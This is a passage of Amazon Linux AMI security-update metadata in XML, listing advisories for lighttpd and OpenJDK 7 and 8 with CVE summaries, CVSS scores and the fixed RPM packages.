arch="i686"><filename>Packages/389-ds-base-1.3.8.4-25.1.62.amzn1.i686.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.8.4" release="25.1.62.amzn1" epoch="0" 
arch="i686"><filename>Packages/389-ds-base-snmp-1.3.8.4-25.1.62.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1265</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1265: medium priority package update for lighttpd</title><issued date="2019-08-07 23:16:00" /><updated date="2024-09-13 01:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-25103:
There exist use-after-free vulnerabilities in lighttpd &lt;= 1.4.50 request parsing which might read from invalid pointers to memory used in the same request, not from other requests.
CVE-2018-19052:
An issue was discovered in mod_alias_physical_handler in mod_alias.c in lighttpd before 1.4.50. There is potential ../ path traversal of a single directory above an alias target, with a specific mod_alias configuration where the matched alias lacks a trailing '/' character, but the alias target filesystem path does have a trailing '/' character.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19052" title="" id="CVE-2018-19052" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25103" title="" id="CVE-2018-25103" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lighttpd" version="1.4.53" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-1.4.53-1.36.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.53" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_geoip-1.4.53-1.36.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_authn_pam" version="1.4.53" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_authn_pam-1.4.53-1.36.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_authn_gssapi" version="1.4.53" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_authn_gssapi-1.4.53-1.36.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.53" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.53-1.36.amzn1.x86_64.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.53" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-debuginfo-1.4.53-1.36.amzn1.x86_64.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.53" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-fastcgi-1.4.53-1.36.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_authn_mysql" version="1.4.53" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_authn_mysql-1.4.53-1.36.amzn1.x86_64.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.53" release="1.36.amzn1" epoch="0" 
arch="i686"><filename>Packages/lighttpd-fastcgi-1.4.53-1.36.amzn1.i686.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.53" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-debuginfo-1.4.53-1.36.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_authn_pam" version="1.4.53" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_authn_pam-1.4.53-1.36.amzn1.i686.rpm</filename></package><package name="lighttpd" version="1.4.53" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-1.4.53-1.36.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.53" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.53-1.36.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.53" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_geoip-1.4.53-1.36.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_authn_gssapi" version="1.4.53" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_authn_gssapi-1.4.53-1.36.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_authn_mysql" version="1.4.53" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_authn_mysql-1.4.53-1.36.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1266</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1266: important priority package update for java-1.8.0-openjdk</title><issued date="2019-08-07 23:35:00" /><updated date="2019-08-12 18:25:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-2698:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: 2D). Supported versions that are affected are Java SE: 7u211 and 8u202. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in takeover of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).
1700447:
CVE-2019-2698 OpenJDK: Font layout engine out of bounds access setCurrGlyphID() (2D, 8219022)
CVE-2019-2684:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 7u211, 8u202, 11.0.2 and 12; Java SE Embedded: 8u201. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N).
1700564:
CVE-2019-2684 OpenJDK: Incorrect skeleton selection in RMI registry server-side dispatch handling (RMI, 8218453)
CVE-2019-2602:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 7u211, 8u202, 11.0.2 and 12; Java SE Embedded: 8u201. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Java SE, Java SE Embedded. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
1700440:
CVE-2019-2602 OpenJDK: Slow conversion of BigDecimal to long (Libraries, 8211936)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2602" title="" id="CVE-2019-2602" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2684" title="" id="CVE-2019-2684" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2698" title="" id="CVE-2019-2698" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.212.b04-0.45.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.212.b04-0.45.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.212.b04-0.45.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.212.b04-0.45.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.212.b04-0.45.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.212.b04-0.45.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.212.b04-0.45.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" 
version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.212.b04-0.45.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.212.b04-0.45.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.212.b04-0.45.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.212.b04-0.45.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.212.b04-0.45.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.212.b04-0.45.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.212.b04" release="0.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.212.b04-0.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1268</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1268: medium priority package update for java-1.7.0-openjdk</title><issued date="2019-08-23 16:53:00" /><updated date="2019-08-26 22:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-2842:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: JCE). The supported version that is affected is Java SE: 8u212. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
1730110:
CVE-2019-2842 OpenJDK: Missing array bounds check in crypto providers (JCE, 8223511)
CVE-2019-2816:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Networking). Supported versions that are affected are Java SE: 7u221, 8u212, 11.0.3 and 12.0.1; Java SE Embedded: 8u211. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).
1730099:
CVE-2019-2816 OpenJDK: Missing URL format validation (Networking, 8221518)
CVE-2019-2786:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 8u212, 11.0.3 and 12.0.1; Java SE Embedded: 8u211. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.4 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N).
1730255:
CVE-2019-2786 OpenJDK: Insufficient restriction of privileges in AccessController (Security, 8216381)
CVE-2019-2769:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Utilities). Supported versions that are affected are Java SE: 7u221, 8u212, 11.0.3 and 12.0.1; Java SE Embedded: 8u211. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1730056:
CVE-2019-2769 OpenJDK: Unbounded memory allocation during deserialization in Collections (Utilities, 8213432)
CVE-2019-2762:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Utilities). Supported versions that are affected are Java SE: 7u221, 8u212, 11.0.3 and 12.0.1; Java SE Embedded: 8u211. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1730415:
CVE-2019-2762 OpenJDK: Insufficient checks of suppressed exceptions in deserialization (Utilities, 8212328)
CVE-2019-2745:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 7u221, 8u212 and 11.0.3. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where Java SE executes to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).
1730411:
CVE-2019-2745 OpenJDK: Side-channel attack risks in Elliptic Curve (EC) cryptography (Security, 8208698)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2745" title="" id="CVE-2019-2745" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2762" title="" id="CVE-2019-2762" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2769" title="" id="CVE-2019-2769" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2786" title="" id="CVE-2019-2786" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2816" title="" id="CVE-2019-2816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2842" title="" id="CVE-2019-2842" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.231-2.6.19.1.80.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.231-2.6.19.1.80.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.231-2.6.19.1.80.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.231-2.6.19.1.80.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.231-2.6.19.1.80.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" 
arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.231-2.6.19.1.80.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.231-2.6.19.1.80.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.231-2.6.19.1.80.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.231-2.6.19.1.80.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.231-2.6.19.1.80.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.231" release="2.6.19.1.80.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.231-2.6.19.1.80.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1269</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1269: medium priority package update for java-1.8.0-openjdk</title><issued date="2019-08-23 16:55:00" /><updated date="2019-08-26 22:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-2842:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: JCE). The supported version that is affected is Java SE: 8u212. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
1730110:
CVE-2019-2842 OpenJDK: Missing array bounds check in crypto providers (JCE, 8223511)
CVE-2019-2816:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Networking). Supported versions that are affected are Java SE: 7u221, 8u212, 11.0.3 and 12.0.1; Java SE Embedded: 8u211. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).
1730099:
CVE-2019-2816 OpenJDK: Missing URL format validation (Networking, 8221518)
CVE-2019-2786:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 8u212, 11.0.3 and 12.0.1; Java SE Embedded: 8u211. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.4 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N).
1730255:
CVE-2019-2786 OpenJDK: Insufficient restriction of privileges in AccessController (Security, 8216381)
CVE-2019-2769:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Utilities). Supported versions that are affected are Java SE: 7u221, 8u212, 11.0.3 and 12.0.1; Java SE Embedded: 8u211. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1730056:
CVE-2019-2769 OpenJDK: Unbounded memory allocation during deserialization in Collections (Utilities, 8213432)
CVE-2019-2762:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Utilities). Supported versions that are affected are Java SE: 7u221, 8u212, 11.0.3 and 12.0.1; Java SE Embedded: 8u211. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1730415:
CVE-2019-2762 OpenJDK: Insufficient checks of suppressed exceptions in deserialization (Utilities, 8212328)
CVE-2019-2745:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 7u221, 8u212 and 11.0.3. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where Java SE executes to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).
1730411:
CVE-2019-2745 OpenJDK: Side-channel attack risks in Elliptic Curve (EC) cryptography (Security, 8208698)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2745" title="" id="CVE-2019-2745" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2762" title="" id="CVE-2019-2762" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2769" title="" id="CVE-2019-2769" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2786" title="" id="CVE-2019-2786" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2816" title="" id="CVE-2019-2816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2842" title="" id="CVE-2019-2842" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.222.b10-0.47.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.222.b10-0.47.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.222.b10-0.47.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.222.b10-0.47.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.222.b10-0.47.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.222.b10" release="0.47.amzn1" epoch="1" 
